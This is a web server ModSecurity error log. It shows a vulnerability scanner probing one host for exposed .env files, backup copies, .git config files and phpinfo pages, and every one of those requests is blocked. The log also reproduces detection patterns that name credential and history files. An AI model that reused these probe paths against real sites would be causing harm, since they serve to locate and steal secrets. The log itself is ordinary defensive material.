[Tue May 26 13:17:24.232968 2026] [security2:error] [pid 501489:tid 501743] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.docker/.env"] [unique_id "ahVQDGkFNZ9cRlz80IjPzwAAAPw"]
[Tue May 26 13:17:24.272801 2026] [security2:error] [pid 501489:tid 501711] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.docker/laravel/app/.env"] [unique_id "ahVQDGkFNZ9cRlz80IjP2AAAAOA"]
[Tue May 26 13:17:24.359387 2026] [security2:error] [pid 501489:tid 501636] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahVQDGkFNZ9cRlz80IjP4AAAAJY"]
[Tue May 26 13:17:24.387998 2026] [security2:error] [pid 501489:tid 501746] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahVQDGkFNZ9cRlz80IjP5AAAAP8"]
[Tue May 26 13:17:24.416445 2026] [security2:error] [pid 501489:tid 501708] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahVQDGkFNZ9cRlz80IjP6AAAAN0"]
[Tue May 26 13:17:24.495009 2026] [security2:error] [pid 501489:tid 501750] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahVQDGkFNZ9cRlz80IjP8gAAAQM"]
[Tue May 26 13:17:24.512029 2026] [security2:error] [pid 501489:tid 501632] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/.env.php"] [unique_id "ahVQDGkFNZ9cRlz80IjP8wAAAJI"]
[Tue May 26 13:17:24.572220 2026] [security2:error] [pid 501489:tid 501631] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env.swp"] [unique_id "ahVQDGkFNZ9cRlz80IjP-wAAAJE"]
[Tue May 26 13:17:25.260704 2026] [security2:error] [pid 501489:tid 501620] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env~"] [unique_id "ahVQDWkFNZ9cRlz80IjQFAAAAIY"]
[Tue May 26 13:17:25.809772 2026] [security2:error] [pid 501489:tid 501654] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQDWkFNZ9cRlz80IjQHAAAAKc"]
[Tue May 26 13:17:25.831406 2026] [security2:error] [pid 501489:tid 501694] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.git/config~"] [unique_id "ahVQDWkFNZ9cRlz80IjQNAAAAM8"]
[Tue May 26 13:17:25.895376 2026] [security2:error] [pid 501489:tid 501637] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.git/config.bak"] [unique_id "ahVQDWkFNZ9cRlz80IjQQAAAAJc"]
[Tue May 26 13:17:25.899139 2026] [security2:error] [pid 501489:tid 501706] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.git/config.old"] [unique_id "ahVQDWkFNZ9cRlz80IjQQgAAANs"]
[Tue May 26 13:17:26.475942 2026] [security2:error] [pid 501489:tid 501744] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/ADMIN/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQgAAAAP0"]
[Tue May 26 13:17:26.489519 2026] [security2:error] [pid 501489:tid 501742] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/API/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQgwAAAPs"]
[Tue May 26 13:17:26.582155 2026] [security2:error] [pid 501489:tid 501716] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/APP/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQhwAAAOU"]
[Tue May 26 13:17:26.594392 2026] [security2:error] [pid 501489:tid 501640] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/Api/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQiAAAAJo"]
[Tue May 26 13:17:26.614940 2026] [security2:error] [pid 501489:tid 501694] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/BACKEND/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQiQAAAM8"]
[Tue May 26 13:17:26.623426 2026] [security2:error] [pid 501489:tid 501737] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/BE/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQigAAAPY"]
[Tue May 26 13:17:26.631362 2026] [security2:error] [pid 501489:tid 501699] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/Backend/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQiwAAANQ"]
[Tue May 26 13:17:26.644687 2026] [security2:error] [pid 501489:tid 501697] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/Be/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQjQAAANI"]
[Tue May 26 13:17:26.761139 2026] [security2:error] [pid 501489:tid 501735] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/BACK/.env"] [unique_id "ahVQDmkFNZ9cRlz80IjQmwAAAPU"]
[Tue May 26 13:17:27.003277 2026] [security2:error] [pid 501489:tid 501651] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVQD2kFNZ9cRlz80IjQtgAAAKQ"]
[Tue May 26 13:17:27.107471 2026] [security2:error] [pid 501489:tid 501743] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/admin-app/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQwgAAAPw"]
[Tue May 26 13:17:27.216161 2026] [security2:error] [pid 501489:tid 501660] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVQD2kFNZ9cRlz80IjQywAAAK0"]
[Tue May 26 13:17:27.238820 2026] [security2:error] [pid 501489:tid 501749] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVQD2kFNZ9cRlz80IjQzAAAAQI"]
[Tue May 26 13:17:27.264679 2026] [security2:error] [pid 501489:tid 501748] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/administrator/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQzQAAAQE"]
[Tue May 26 13:17:27.280611 2026] [security2:error] [pid 501489:tid 501630] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/api-backend/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQzwAAAJA"]
[Tue May 26 13:17:27.289157 2026] [security2:error] [pid 501489:tid 501715] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/api-node/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQ0QAAAOQ"]
[Tue May 26 13:17:27.324375 2026] [security2:error] [pid 501489:tid 501688] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/api/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQ1gAAAMk"]
[Tue May 26 13:17:27.483180 2026] [security2:error] [pid 501489:tid 501739] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/api/info.php"] [unique_id "ahVQD2kFNZ9cRlz80IjQ4QAAAPg"]
[Tue May 26 13:17:27.562893 2026] [security2:error] [pid 501489:tid 501669] [client 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/api/phpinfo.php"] [unique_id "ahVQD2kFNZ9cRlz80IjQ6QAAALY"]
[Tue May 26 13:17:27.761508 2026] [security2:error] [pid 501489:tid 501673] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/apis/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjQ_gAAALo"]
[Tue May 26 13:17:27.848652 2026] [security2:error] [pid 501489:tid 501620] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/app/.env"] [unique_id "ahVQD2kFNZ9cRlz80IjRCAAAAIY"]
[Tue May 26 13:17:28.093476 2026] [security2:error] [pid 501489:tid 501750] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/application/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRJAAAAQM"]
[Tue May 26 13:17:28.103191 2026] [security2:error] [pid 501489:tid 501658] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/apps/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRJQAAAKs"]
[Tue May 26 13:17:28.308542 2026] [security2:error] [pid 501489:tid 501746] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQD2kFNZ9cRlz80IjRBwAAAP8"]
[Tue May 26 13:17:28.444755 2026] [security2:error] [pid 501489:tid 501743] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/back-api/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRQwAAAPw"]
[Tue May 26 13:17:28.476952 2026] [security2:error] [pid 501489:tid 501620] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/back/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRRAAAAIY"]
[Tue May 26 13:17:28.480260 2026] [security2:error] [pid 501489:tid 501685] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/back-end/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRRQAAAMY"]
[Tue May 26 13:17:28.500564 2026] [security2:error] [pid 501489:tid 501709] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahVQEGkFNZ9cRlz80IjRRwAAAN4"]
